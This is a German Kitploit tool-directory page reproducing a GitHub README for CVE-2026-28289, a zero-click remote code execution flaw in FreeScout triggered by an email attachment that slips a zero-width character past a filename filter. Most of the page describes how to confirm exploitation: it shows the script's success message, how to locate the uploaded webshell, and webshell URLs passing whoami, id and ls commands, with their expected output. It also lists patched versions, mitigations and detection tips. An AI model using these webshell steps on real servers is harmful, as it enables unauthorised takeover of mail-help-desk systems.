Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-28289 — CVE-2026-28289 | Kitploit
Tools/GitHubGitHub/0xblackash/cve-2026-28289
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsPayload-EntwicklungE-Mail-Sicherheit
GitHub0xblackash/cve-2026-28289

CVE-2026-28289

CVE-2026-28289

Repository anzeigen
15vor 6 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🚨 CVE-2026-28289 — “Mail2Shell”

1772564185117

Unauthentifizierte Zero-Click-RCE in FreeScout über einen E-Mail-Anhang-Bypass

Severity CVSS Affected Patched


📖 Überblick

CVE-2026-28289, auch Mail2Shell genannt, ist eine kritische Zero-Click-Remote-Code-Execution-Schwachstelle (RCE), die FreeScout betrifft.

Ein Angreifer kann eine speziell präparierte E-Mail an ein FreeScout-Postfach senden und Remote-Shell-Zugriff auf den zugrunde liegenden Server erlangen — ohne Authentifizierung und ohne Benutzerinteraktion.


🧠 Schwachstellenübersicht

Tool herunterladen
FeldWert
CVE-IDCVE-2026-28289
Schweregrad🔴 Kritisch
CVSS10.0 (Maximal)
AngriffsvektorRemote (E-Mail)
Authentifizierung erforderlich❌ Keine
Benutzerinteraktion❌ Keine
AuswirkungVollständige Server-Kompromittierung

⚙️ Technische Aufschlüsselung

📨 Schritt 1 — Zustellung einer schädlichen E-Mail

Der Angreifer sendet eine E-Mail mit einem speziell präparierten Anhang.

🧩 Schritt 2 — Umgehung der Dateinamen-Bereinigung

FreeScout versucht, gefährliche Dateien wie .htaccess zu blockieren, aber der Angreifer:

  • Stellt ein Zero-Width-Unicode-Zeichen voran
  • Umgeht die Dateinamen-Validierung
  • Die Datei wird als gültige ausführbare Serverdatei gespeichert

💣 Schritt 3 — Remote-Ausführung

Der Angreifer greift über den Webpfad auf die hochgeladene Datei zu und führt beliebige Befehle aus.

Ergebnis:

root@kitploit:~
# Remote shell access achieved
whoami
www-data

✅ Wenn der Vorgang erfolgreich ist, sehen Sie hier GENAU das, was Sie (Schritt für Schritt) sehen werden:

mail2shell

1. In Ihrem Terminal (direkt nach dem Ausführen des Skripts)

root@kitploit:~
✅ Email sent successfully! (Zero-Click RCE triggered)

Sie sehen außerdem die Anweisungen für die nächsten Schritte.

2. Wenn Sie den Befehl find per SSH auf Ihrem FreeScout-Server ausführen

Er gibt sofort den vollständigen echten Pfad zur hochgeladenen Datei zurück, zum Beispiel:

root@kitploit:~
/var/www/html/storage/attachment/2026/03/05/15/webshell.txt

(oder einen ähnlichen Datums-/Uhrzeit-Ordner — das bestätigt, dass FreeScout den Anhang automatisch gespeichert hat).

3. Der ECHTE Erfolgsnachweis — in Ihrem Browser (das ist der Moment, in dem Sie wissen, dass Sie volle RCE haben)

Kopieren Sie den Pfad aus Schritt 2 und öffnen Sie diese URL:

root@kitploit:~
http://your-freescout-domain.com/storage/attachment/2026/03/05/15/webshell.txt?cmd=whoami

Sie sehen genau diese Ausgabe (als Klartext):

root@kitploit:~
www-data

(Oder welcher Apache/PHP-Benutzer auch immer auf Ihrem Server läuft — normalerweise www-data, apache oder nobody).

Ändern Sie nun den Befehl und laden Sie die Seite neu:

root@kitploit:~
http://your-freescout-domain.com/storage/attachment/2026/03/05/15/webshell.txt?cmd=id

Sie werden sehen:

root@kitploit:~
uid=33(www-data) gid=33(www-data) groups=33(www-data)

Und für ls -la:

root@kitploit:~
total 12
drwxr-xr-x 2 www-data www-data 4096 Mar  5 15:00 .
drwxr-xr-x 8 www-data www-data 4096 Mar  5 14:00 ..
-rw-r--r-- 1 www-data www-data   87 Mar  5 15:00 webshell.txt

Diese Ausgabe erscheint direkt auf der Browserseite (innerhalb der <pre>-Tags der Webshell). Kein Fehler, kein PHP-Quellcode, keine 404.

Das bedeutet, dass Sie volle Remote-Code-Ausführung auf dem Server haben — der Bypass per .htaccess und Zero-Width-Space hat einwandfrei funktioniert, und der E-Mail-Anhang wurde ohne jegliche Benutzerinteraktion verarbeitet.


🎯 Warum das gefährlich ist

  • ⚡ Zero-Click-Ausnutzung
  • 🌐 Remote-Angriffsfläche (E-Mail)
  • 🔓 Keine Authentifizierung erforderlich
  • 🧨 Volle RCE-Fähigkeit
  • 📂 Potenzielle Datenexfiltration
  • 🔁 Laterale Bewegung innerhalb interner Netzwerke

📦 Betroffene Versionen

Alle Versionen von FreeScout:

root@kitploit:~
<= 1.8.206

✅ Gepatchte Version

Aktualisieren Sie sofort auf:

root@kitploit:~
1.8.207 or later

🛡️ Gegenmaßnahmen

1️⃣ Sofortmaßnahme

  • Aktualisieren Sie FreeScout auf die neueste Version

2️⃣ Webserver härten

  • Deaktivieren Sie AllowOverride All in der Apache-Konfiguration
  • Beschränken Sie die Ausführung in Anhangsverzeichnissen

3️⃣ Protokolle überwachen

Achten Sie auf:

  • Verdächtige .htaccess-Dateien
  • Ungewöhnliche Anhangs-Uploads
  • Direkte Zugriffsversuche auf /storage/attachments/

🔍 Erkennungstipps

Indikatoren einer Kompromittierung können sein:

  • Unbekannte .htaccess-Dateien in Anhangsordnern
  • Spitzen im ausgehenden Datenverkehr
  • Webserver, der Shell-Prozesse startet
  • Verdächtige POST/GET-Anfragen an Anhangspfade

🧪 Proof-of-Concept (Konzeptionell)

root@kitploit:~
Email → Malicious Attachment (Unicode prefixed filename)
        ↓
Saved to predictable path
        ↓
Web-accessible execution
        ↓
Remote shell

📌 Verwandte Schwachstelle

Dieses Problem umging die Schutzmaßnahmen, die in folgendem CVE hinzugefügt wurden:

  • CVE-2026-27636

Dies zeigt, dass die Dateinamen-Bereinigungslogik unvollständig ist.


📊 Auswirkungsbewertung

RisikobereichAuswirkung
Vertraulichkeit🔴 Hoch
Integrität🔴 Hoch
Verfügbarkeit🔴 Hoch

🧩 Erkenntnisse

  • Die Unicode-Behandlung muss vor der Validierung normalisiert werden
  • Verlassen Sie sich niemals ausschließlich auf die Dateinamen-Filterung
  • Anhangsverzeichnisse sollten niemals Code-Ausführung erlauben
  • Zero-Click-Vektoren sind Angriffsflächen mit hohem Risiko

📚 Referenzen

  • FreeScout-Sicherheitshinweis
  • NVD-Eintrag für CVE-2026-28289

🚨 Abschließende Empfehlung

Wenn Sie eine selbst gehostete Instanz von FreeScout betreiben:

🔥 Patchen Sie sofort. 💡 Gehen Sie von einer Kompromittierung aus, wenn gefährdete Versionen dem Internet ausgesetzt waren. 🛡 Führen Sie eine Protokollprüfung und Integritätschecks durch.